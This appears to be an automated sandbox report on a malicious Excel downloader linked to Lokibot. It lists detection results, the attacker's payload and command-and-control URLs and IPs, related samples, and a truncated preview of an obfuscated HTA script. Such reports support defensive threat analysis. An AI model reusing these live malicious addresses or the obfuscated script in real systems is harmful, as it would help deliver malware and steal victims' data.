Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Security Software Discovery	Distributed Component Object Model	11 Email Collection	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	37%	ReversingLabs	Document-Word.Exploit.CVE-2017-0199
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.46	true	false	unknown
drive.usercontent.google.com	172.217.16.193	true	false	unknown
mpa.li	5.159.62.244	true	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://mpa.li/ZDFWtO	false	unknown
http://kbfvzoboss.bid/alien/fre.php	true	unknown
http://alphastand.top/alien/fre.php	true	unknown
	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta	true	unknown
http://94.156.177.220/simple/five/fre.php	true	unknown
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF	true	unknown
http://192.3.176.141/35/SMLPERR.txt	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaf	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htag	mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/educatio	powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFp	powershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mpa.li/	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta_	mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.ibsensoftware.com/	AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaw	mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htal	mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://go.micros	powershell.exe, 00000006.00000002.452706193.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF34e089r	powershell.exe, 00000006.00000002.456851525.000000001A9FB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htak	mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaG	mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mpa.li/C:T	mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaA	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/Z	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htahttp://192.3.176.	mshta.exe, 00000004.00000003.418291417.0000000002975000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta...	mshta.exe, 00000004.00000003.417828782.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.00000000037D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.google.com	powershell.exe, 0000000F.00000002.502500723.0000000002652000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com	powershell.exe, 0000000F.00000002.502500723.000000000281A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaS	mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.452706193.0000000002031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.604737245.000000000237E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.502500723.0000000002451000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mpa.li/6432H	mshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.3.176.141	unknown	United States	36352	AS-COLOCROSSINGUS	true
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
5.159.62.244	mpa.li	Germany	59507	TLN-ASDE	false
5.159.62.243	unknown	Germany	59507	TLN-ASDE	false
94.156.177.220	unknown	Bulgaria	43561	NET1-ASBG	true
172.217.16.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541460
Start date and time:	2024-10-24 21:21:21 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@18/28@4/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 48 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target mshta.exe, PID 3868 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Simulations

Behavior and APIs

Time	Type	Description
15:22:37	API Interceptor	78x Sleep call for process: mshta.exe modified
15:22:43	API Interceptor	548x Sleep call for process: powershell.exe modified
15:22:57	API Interceptor	7x Sleep call for process: wscript.exe modified
15:23:23	API Interceptor	462x Sleep call for process: AddInProcess32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.3.176.141	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/36/LOGS%20LOKI.txt
	Logs.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/43/LCRDDFR.txt
	logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
	greatwayforbestthignswithwhonotwanttodo.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
	PPM435679.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/551/cw/nicevisionnicemagicalthinsforentirelifetogetmebackwithgreat.hta
	Purchase order.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/550/cw/fullofconfidentwithgreatnicethingswedonewithgreatattitude.hta
	Payment Advice080.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/456/cs/verynicesweetgirlsareeverywheretogetmein.hta
	Purchase order.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/455/ed/createnewthingswithmygrilstobeinline.hta
	Purchase order.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
	Purchase order.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
5.159.62.244	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse
5.159.62.243	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse
94.156.177.220	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mpa.li	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	5.159.62.244

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	107.175.113.214
	Supplier Purchase Order - PO0002491.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	192.210.150.14
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	192.210.187.71
	bot.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	192.210.187.71
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	192.210.187.71
	transferencia interbancaria_66579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	107.172.31.13
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	192.3.216.142
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.46.178.134
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141
	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	192.210.215.8
TLN-ASDE	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	5.159.62.243
	zDAH4anUtC.elf	Get hash	malicious	Unknown	Browse	5.159.88.227
	x86.elf	Get hash	malicious	Unknown	Browse	5.159.88.221
	arm7.elf	Get hash	malicious	Mirai	Browse	5.159.88.226
	hR6s75mYfS.elf	Get hash	malicious	Mirai	Browse	5.159.88.234
	sora.x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.221
	zMtlCW3JE2.exe	Get hash	malicious	Unknown	Browse	5.159.57.195
	x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.220
	TV9gyhWdj9.elf	Get hash	malicious	Mirai	Browse	5.159.88.230
	gWG8IWTQvp.elf	Get hash	malicious	Mirai	Browse	5.159.88.202
TLN-ASDE	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	5.159.62.243
	zDAH4anUtC.elf	Get hash	malicious	Unknown	Browse	5.159.88.227
	x86.elf	Get hash	malicious	Unknown	Browse	5.159.88.221
	arm7.elf	Get hash	malicious	Mirai	Browse	5.159.88.226
	hR6s75mYfS.elf	Get hash	malicious	Mirai	Browse	5.159.88.234
	sora.x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.221
	zMtlCW3JE2.exe	Get hash	malicious	Unknown	Browse	5.159.57.195
	x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.220
	TV9gyhWdj9.elf	Get hash	malicious	Mirai	Browse	5.159.88.230
	gWG8IWTQvp.elf	Get hash	malicious	Mirai	Browse	5.159.88.202
NET1-ASBG	sample.bin	Get hash	malicious	Okiru	Browse	93.123.85.166
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	hZ6ZMDS1rc.exe	Get hash	malicious	AsyncRAT	Browse	93.123.39.76
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	93.123.85.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.46 172.217.16.193
	transferencia interbancaria_66579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.250.186.46 172.217.16.193
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	142.250.186.46 172.217.16.193
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.250.186.46 172.217.16.193
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	142.250.186.46 172.217.16.193
	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	142.250.186.46 172.217.16.193
	#PO247762.docx	Get hash	malicious	Remcos	Browse	142.250.186.46 172.217.16.193
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	142.250.186.46 172.217.16.193
	PO NAHK22012FA00000.docx.doc	Get hash	malicious	Remcos	Browse	142.250.186.46 172.217.16.193
	Logs.xls	Get hash	malicious	Lokibot	Browse	142.250.186.46 172.217.16.193
7dcce5b76c8b17472d024758970a406b	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	5.159.62.244 5.159.62.243
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	5.159.62.244 5.159.62.243
	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	#PO247762.docx	Get hash	malicious	Remcos	Browse	5.159.62.244 5.159.62.243
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	PO NAHK22012FA00000.docx.doc	Get hash	malicious	Remcos	Browse	5.159.62.244 5.159.62.243
	Logs.xls	Get hash	malicious	Lokibot	Browse	5.159.62.244 5.159.62.243
	Inv No.248740.xls	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	5.159.62.244 5.159.62.243

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category:	modified
Size (bytes):	133649
Entropy (8bit):	2.1533183691243516
Encrypted:	false
SSDEEP:	96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T
MD5:	401FA9878282B2404925D1AC2599B7C0
SHA1:	876D5EA4B89EF48CD614FC098154E3E2CAA176F3
SHA-256:	B8E2FC58AFA34CD0E92AA8A763D8CD49E240B47330EB2DA9651E04150BD04948
SHA-512:	45E2DE1E196AE5339DF31581BD8E98AF094AB461F80269A815F369E51E131A885BB9745C60375AA4C95DB75E82D58F799C5AE480AC2AA0B8387BAA2AEA2D0F63
Malicious:	true
Preview:	<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScriPT%252520LAnGuAGE%25253D%252522VbSCriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\educationalthingswithgreatattitudeonhere[1].tiff

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	141118
Entropy (8bit):	3.6910993454239835
Encrypted:	false
SSDEEP:	3072:airLgt5pUGwjz5D7euCuqhYJ5PcJXqlgLR+eAMiKGG2:yYJBc5qlgLAY2
MD5:	FE9E18E3366CA7AC8C21EB1CE0631D9C
SHA1:	51BC2BC37E87E2D64129CAD63DF697A68EE3B9D6
SHA-256:	01C6399FC31B4CBFCF8E851FF3FF433D36B46DA2577F9230B9C78B2CBF790912
SHA-512:	7DCA4FB22F5F1A6E08F6C993A7B159863B8B1A8898429AED78582641BC2340CE2FBE3E92F6EC5F9D6EC5C74A14009F77CE87602BEA7BA59C4EA1E092D5A9F8F7
Malicious:	false
